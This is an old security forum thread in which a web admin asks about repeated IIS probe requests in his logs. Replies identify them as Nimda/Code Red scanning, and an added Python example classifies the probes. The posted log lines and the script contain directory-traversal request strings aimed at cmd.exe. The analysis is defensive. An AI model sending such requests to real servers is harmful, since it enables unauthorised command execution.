What's he using...?

#1 slick_shoes, Junior Member
    Join Date: Aug 2002
    Posts: 11

    For the past 17 hours, the same IP has been giving me the following log files on my web server:

    [04/Mar/2003:00:39:16 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 327 "-" "-"
    [04/Mar/2003:00:39:18 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
    [04/Mar/2003:00:39:19 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
    [04/Mar/2003:00:39:20 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
    [04/Mar/2003:00:39:20 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
    [04/Mar/2003:00:39:22 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 366 "-" "-"
    [04/Mar/2003:00:39:22 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 366 "-" "-"
    [04/Mar/2003:00:39:23 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 382 "-" "-"
    [04/Mar/2003:00:39:24 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
    [04/Mar/2003:00:39:26 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
    [04/Mar/2003:00:39:26 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
    [04/Mar/2003:00:39:27 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
    [04/Mar/2003:00:39:28 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339 "-" "-"
    [04/Mar/2003:00:39:29 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339 "-" "-"
    [04/Mar/2003:00:39:30 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
    [04/Mar/2003:00:39:31 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"

    He is obviously using a "tool" to do this, seeing how rapid the requests are and the fact that he's been doing it pretty consistently over the past 17 hours... do any of you know what program he is using? I would think the logs would be a pretty telltale sign of what he was using...

    Also, if these attacks go on any longer, I'm going to want to take some kind of action against him. What steps would be plausible in this situation?

    Thanks,
    slick_shoes

#2 powertoad5000, Senior Member
    Join Date: Jun 2002
    Posts: 405
    Not completely sure, but this looks pretty much the same as another set of logs which have been posted just recently in another thread. You can find more information in the following threads:

    Apache Security Question
    hacked

#3 indolent, Senior Member
    Join Date: Jan 2002
    Posts: 121
    Contact the person's ISP and give them the IP and the time table of the events. They'll choose their own course of action.
    what is love but contempt for hate?

#4 Tiger Shark, AO Ancient: Team Leader
    Join Date: Oct 2002
    Posts: 5,197
    It's a pretty basic Nimda/Code Red automated thing..... See it all the time on my boxes.... If you are patched... which you appear to be by the 404 error codes in the log, you have nothing to worry about......

    Complaining to the ISP will become a full time job..... If it's not a pain for you, go ahead and send the logs..... But it will become a problem if you host web sites....
    Don't SYN us.... We'll SYN you.....
    "A nation that draws too broad a difference between its scholars and its warriors will have its thinking done by cowards, and its fighting done by fools." - Thucydides
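The scan Tiger Shark identifies above, as an added example that is not part of the original thread: a small Python classifier that parses the 16 posted log lines, undoes the two IIS decoding bugs the probes aim at (a second, superfluous percent-decode and acceptance of overlong UTF-8 sequences such as %c0%af, the MS01-026 and MS00-078 directory-traversal bugs) to show that every request resolves to the same cmd.exe or root.exe target, and then applies the check Tiger Shark's reply rests on: a probe answered with 404/400 was rejected, a probe answered with 2xx means the host ran the command and needs investigation. The decoding model is a simplified reconstruction, the function names are the example's own, and the single 200-status line (CONSTRUCTED_HIT) is constructed for the example and is not from the thread.

```python
"""Classify the IIS probe sequence shown in the thread from an Apache-style log.

Example added for this thread; it is not code from the original post.  The 16
log lines below are the ones the poster quoted (no client IP field was quoted,
so the parser does not try to read one).  CONSTRUCTED_HIT is constructed for
the example and is NOT from the thread.
"""
import re
from collections import Counter
from typing import Optional
from urllib.parse import unquote_to_bytes

POSTED_LOG = r"""
[04/Mar/2003:00:39:16 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 327 "-" "-"
[04/Mar/2003:00:39:18 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
[04/Mar/2003:00:39:19 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
[04/Mar/2003:00:39:20 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
[04/Mar/2003:00:39:20 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
[04/Mar/2003:00:39:22 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 366 "-" "-"
[04/Mar/2003:00:39:22 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 366 "-" "-"
[04/Mar/2003:00:39:23 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 382 "-" "-"
[04/Mar/2003:00:39:24 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
[04/Mar/2003:00:39:26 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
[04/Mar/2003:00:39:26 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
[04/Mar/2003:00:39:27 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
[04/Mar/2003:00:39:28 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339 "-" "-"
[04/Mar/2003:00:39:29 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339 "-" "-"
[04/Mar/2003:00:39:30 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
[04/Mar/2003:00:39:31 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
"""

# CONSTRUCTED for this example, not from the thread: the same probe answered
# with 200, i.e. what an unpatched IIS host that actually ran cmd.exe would log.
CONSTRUCTED_HIT = ('[04/Mar/2003:00:40:00 -0800] "GET /scripts/..%255c../winnt/'
                   'system32/cmd.exe?/c+dir HTTP/1.0" 200 512 "-" "-"\n')

LINE_RE = re.compile(r'\[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) '
                     r'(?P<proto>HTTP/[\d.]+)" (?P<status>\d{3}) (?P<size>\S+)')


def parse_line(line: str) -> Optional[dict]:
    """Split one access-log line into its fields; None if it does not parse."""
    m = LINE_RE.search(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["path"], _, rec["query"] = rec["target"].partition("?")
    return rec


def lenient_decode(text: str) -> str:
    """One decoding pass modelled on the old IIS behaviour these probes target.

    Simplified model (an assumption of this example): %XX is decoded, and an
    overlong two-byte UTF-8 form such as %c0%af or %c1%1c is folded to the
    7-bit character it encodes instead of being rejected as malformed.
    """
    data = unquote_to_bytes(text.encode("latin-1", "replace"))
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b in (0xC0, 0xC1) and i + 1 < len(data):
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)


def canonical_path(path: str) -> str:
    """Decode twice (the 'superfluous decode' bug), then fold \\ to / and lowercase."""
    return lenient_decode(lenient_decode(path)).replace("\\", "/").lower()


def classify(path: str) -> Optional[str]:
    """Name the probe family a request belongs to, or None if it is not one."""
    canon, raw = canonical_path(path), path.lower()
    if canon.endswith("/root.exe"):          # cmd.exe copy left behind by Code Red II
        return "root.exe backdoor"
    if re.match(r"^/[a-z]/winnt/system32/cmd\.exe$", canon):
        return "drive-letter vroot"          # /c/, /d/ mapped to whole drives
    if "../" in canon and canon.endswith("/cmd.exe"):
        if "%25" in raw or "%%" in raw:     # checked first: mixed probes count here
            return "double-decode traversal"
        if re.search(r"%c[01]%", raw):
            return "overlong-utf8 traversal"
        return "plain traversal"
    return None


def analyze(log_text: str) -> dict:
    """Count probe families and collect every probe the server answered with 2xx."""
    families, hits, probes = Counter(), [], 0
    for line in log_text.strip().splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        family = classify(rec["path"])
        if family is None:
            continue
        probes += 1
        families[family] += 1
        if 200 <= rec["status"] < 300:      # the probe was executed, not rejected
            hits.append(rec)
    return {"probes": probes, "families": families, "hits": hits}


if __name__ == "__main__":
    for text in (POSTED_LOG, POSTED_LOG + CONSTRUCTED_HIT):
        result = analyze(text)
        print(f"{result['probes']} probes: {dict(result['families'])}")
        print("patched, ignore" if not result["hits"] else "2xx on a probe: investigate the host")
        for rec in result["hits"]:
            print("  HIT", rec["ts"], rec["target"], rec["status"])
```

Run as-is it reports the posted lines as 16 probes in four families with no 2xx answers, which is the "patched" verdict in the reply above; with the constructed 200 line appended it flags that one request. The same per-family counts are what to put in an ISP complaint if one is sent.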

#5 slick_shoes, Junior Member
    Join Date: Aug 2002
    Posts: 11
    Thanks for the replies...
    Have a good day!

    slick_shoes
